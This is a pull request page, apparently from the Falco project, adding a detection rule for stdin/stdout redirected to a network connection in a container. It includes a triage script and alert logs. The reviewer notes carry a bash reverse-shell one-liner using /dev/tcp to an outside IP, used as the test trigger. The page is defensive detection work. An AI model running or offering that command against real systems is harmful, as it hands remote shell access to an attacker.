
rule update: add a rule to detect reverse shell #1152

Merged
merged 2 commits into from
Apr 21, 2020

Conversation

@Kaizhe Kaizhe (Contributor) commented Apr 17, 2020

Signed-off-by: kaizhe derek0405@gmail.com

What type of PR is this?

Uncomment one (or more) /kind <> lines:

/kind bug

/kind cleanup

/kind design

/kind documentation

/kind failing-test

/kind feature

If contributing rules or changes to rules, please make sure to also uncomment one of the following lines:

/kind rule-update

/kind rule-create

Any specific area of the project related to this PR?

Uncomment one (or more) /area <> lines:

/area build

/area engine

/area examples

/area rules

/area integrations

/area tests

/area proposals

What this PR does / why we need it:
Detect reverse shell connection from a container.

Which issue(s) this PR fixes:

Fixes #

Special notes for your reviewer:
/bin/bash -i >& /dev/tcp/34.204.xxx.xxx/1234 0>&1 -- reverse shell execution

18:27:10.379958969: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)
18:27:10.379959879: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)

Does this PR introduce a user-facing change?:

rule(Redirect STDOUT/STDIN to Network Connection in Container): new rule to detect Redirect stdout/stdin to network connection in container
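As an added illustration (not code from this PR or from Falco itself), a small Python triage helper that parses Falco's text-format alerts like the two above, applies the condition the new rule name describes (fd 0, 1 or 2 of a process inside a container is an IPv4/IPv6 socket) and collapses the duplicated events into one finding per container, process, fd and remote endpoint. The third sample line and the `host` value for a non-container event are constructed assumptions.

```python
import re

# Constructed sample input: the two alert lines from the PR description plus one
# constructed non-matching line (fd.num=3 is an ordinary socket, not stdin/stdout/stderr).
SAMPLE_ALERTS = """\
18:27:10.379958969: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)
18:27:10.379959879: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)
18:27:12.000000000: Notice Outbound connection (user=root nginx (id=bb52e96baba9) process=curl parent=bash cmdline=curl terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50200->34.204.205.146:443 fd.num=3 fd.type=ipv4 fd.sip=34.204.205.146)
"""

# "<time>: <Priority> <rule output text> (<key=value fields>)"
LINE_RE = re.compile(r"^(?P<ts>\S+): (?P<prio>\w+) (?P<rule>.*?) \((?P<fields>.*)\)$")
# key=value pairs; values stop at whitespace or parentheses so "nginx (id=...)" parses cleanly
KV_RE = re.compile(r"([\w.]+)=([^\s()]+)")


def parse_alert(line):
    """Split one text-format Falco alert into timestamp, priority, rule text and a field dict."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": m.group("ts"), "priority": m.group("prio"),
            "rule": m.group("rule"), "fields": dict(KV_RE.findall(m.group("fields")))}


def stdio_redirected_to_network(fields):
    """The behaviour the rule name describes: a standard fd of a containerised process is a socket.
    Assumption: a non-container event carries container_id=host (or no container_id at all)."""
    return (fields.get("container_id", "host") != "host"
            and fields.get("fd.num") in ("0", "1", "2")
            and fields.get("fd.type") in ("ipv4", "ipv6"))


def triage(alert_text):
    """Return one finding per (container, process, fd, remote endpoint), counting duplicate events."""
    findings = {}
    for line in alert_text.splitlines():
        alert = parse_alert(line)
        if not alert or not stdio_redirected_to_network(alert["fields"]):
            continue
        f = alert["fields"]
        local, _, remote = f["fd.name"].partition("->")
        key = (f["container_id"], f["process"], f["fd.num"], remote)
        if key not in findings:
            findings[key] = {"first_seen": alert["ts"], "image": f.get("image"),
                             "process": f["process"], "fd.num": int(f["fd.num"]),
                             "local": local, "remote": remote, "count": 0}
        findings[key]["count"] += 1
    return list(findings.values())
```

Running `triage(SAMPLE_ALERTS)` yields a single finding for fd 1 of `bash` in container `bb52e96baba9` to `34.204.205.146:1234` with a count of 2; the `curl` line is ignored because fd 3 is not a standard stream.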

Signed-off-by: kaizhe <derek0405@gmail.com>
@poiana poiana requested review from fntlnz and mfdii April 17, 2020 18:52
@poiana poiana added the size/XS label Apr 17, 2020
@Kaizhe Kaizhe requested review from mstemm and removed request for mfdii April 20, 2020 20:12
@@ -2795,7 +2795,12 @@
priority: WARNING
tags: [network]


- rule: Reverse shell
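Review bot: the name on the added `- rule: Reverse shell` line claims more than the rule can observe; a reverse shell that does not hand a socket to fd 0/1/2 would not trigger it, and other programs that do so are not necessarily shells, so the name should state the behaviour being detected, for example the `Redirect STDOUT/STDIN to Network Connection in Container` wording already used in the PR's user-facing change line (the alert text "Reverse shell connection" in the sample output should follow the rename). The header `@@ -2795,7 +2795,12 @@` says five lines were added, but only the name line is visible here, so the condition, desc and output fields of the new rule cannot be checked from this excerpt.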
Contributor (reviewer) commented:

Can you make the rule name more specific to the actual behavior, something like "redirecting stdout to network connection in container"? There could be all kinds of reverse shells that don't use this technique.

Contributor Author commented:

Done. Thanks!

Signed-off-by: kaizhe <derek0405@gmail.com>
@poiana poiana added the lgtm label Apr 21, 2020
@poiana

poiana commented Apr 21, 2020

LGTM label has been added.

Git tree hash: 080e7989d2774ea938d72f736b8895a691bcca04

@poiana

poiana commented Apr 21, 2020

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: fntlnz, mstemm

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@fntlnz (Contributor)

fntlnz commented Apr 21, 2020

Great work, thanks @Kaizhe

@poiana poiana merged commit f7ac7f3 into master Apr 21, 2020
@poiana poiana deleted the kh_add-rule-reverse-shell branch April 21, 2020 17:04
@leodido leodido added this to the 0.23.0 milestone Apr 22, 2020
@fntlnz (Contributor)

fntlnz commented Apr 24, 2020

@Kaizhe I updated the description to let it work correctly in the changelog.

@Kaizhe (Contributor Author)

Kaizhe commented Apr 24, 2020

Thanks a lot @fntlnz !
